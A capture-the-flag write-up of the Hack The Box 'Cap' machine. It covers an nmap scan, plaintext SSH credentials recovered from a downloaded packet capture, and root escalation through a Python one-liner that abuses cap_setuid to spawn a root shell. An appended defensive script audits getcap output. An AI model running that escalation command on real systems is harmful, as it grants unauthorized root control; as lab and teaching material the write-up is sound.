IT and security stuff

HTB – Cap Writeup

 neoh  main  ~/HTB/cap  sudo nmap -sSCV -p- -T4 -oN
[sudo] password for neoh: 
Starting Nmap 7.80 ( ) at 2021-11-14 16:03 EST
Nmap scan report for
Host is up (0.026s latency).
Not shown: 65532 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 140.57 seconds

Nmap reveals FTP, SSH and HTTP. I couldn't log in to FTP successfully, so I went to the website.

The website reveals some sort of security web app.
We can download a PCAP file.

The pcap had nothing really interesting. Going back to the website and looking at the URL, I wondered what was at /data/0. It seemed to be an older report, so I downloaded it.

I could see an SSH authentication which was in plain text, lol.
 neoh  main  ~/HTB/validation  ssh nathan@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
nathan@'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Sun Nov 14 21:13:58 UTC 2021

  System load:  0.19              Processes:             255
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 20%               IPv4 address for eth0:
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from
nathan@cap:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.

After a couple of minutes of enumeration, I found something nice.

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
nathan@cap:~$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'

Because /usr/bin/python3.8 carries cap_setuid, we can call os.setuid(0) from Python and spawn a root shell, exactly as a SUID binary would let us.

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami
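A defender's counterpart to the getcap step above, added here as an example that is not part of the original writeup: it parses getcap output (the lines shown above, embedded as a constructed sample) and flags root-equivalent capabilities such as the cap_setuid on python3.8. The DANGEROUS list and the setcap -r remediation hint are my assumptions, not something the box or the writeup provides.

```python
import re

# Root-equivalent capabilities when a user can run the binary with code or
# arguments of their choosing (a short, assumption-based list, not exhaustive).
DANGEROUS = {
    "cap_setuid": "switch to uid 0 (e.g. os.setuid(0))",
    "cap_setgid": "switch to gid 0",
    "cap_dac_override": "ignore file permission checks",
    "cap_sys_admin": "broad administrative rights",
}

# Both libcap output styles:  "/bin/x = cap_a,cap_b+eip"  (older, as here)
# and "/bin/x cap_a,cap_b=eip" (libcap >= 2.41).  Flags: e/p/i.
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")

def parse_getcap(text):
    """Parse getcap output into [{'path', 'caps': set, 'flags': set}, ...]."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # blank lines and unusual formats are skipped
            entries.append({"path": m["path"],
                            "caps": set(m["caps"].split(",")),
                            "flags": set(m["flags"])})
    return entries

def find_risky(entries):
    """Report dangerous caps in the permitted set; 'i' alone is not usable."""
    findings = []
    for e in entries:
        if "p" not in e["flags"]:
            continue
        for cap in sorted(c for c in e["caps"] if c in DANGEROUS):
            findings.append({"path": e["path"], "cap": cap,
                             "why": DANGEROUS[cap],
                             "fix": f"setcap -r {e['path']}"})
    return findings

# Constructed sample: three of the getcap lines from the writeup above.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    for f in find_risky(parse_getcap(SAMPLE)):
        print(f"{f['path']}: {f['cap']} ({f['why']}) -> {f['fix']}")
```

Feed it the real output with `getcap -r / 2>/dev/null | python3 audit_caps.py`-style piping by reading stdin instead of SAMPLE; only the python3.8 line is reported for this box, since cap_net_raw and cap_net_admin are not in the list.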
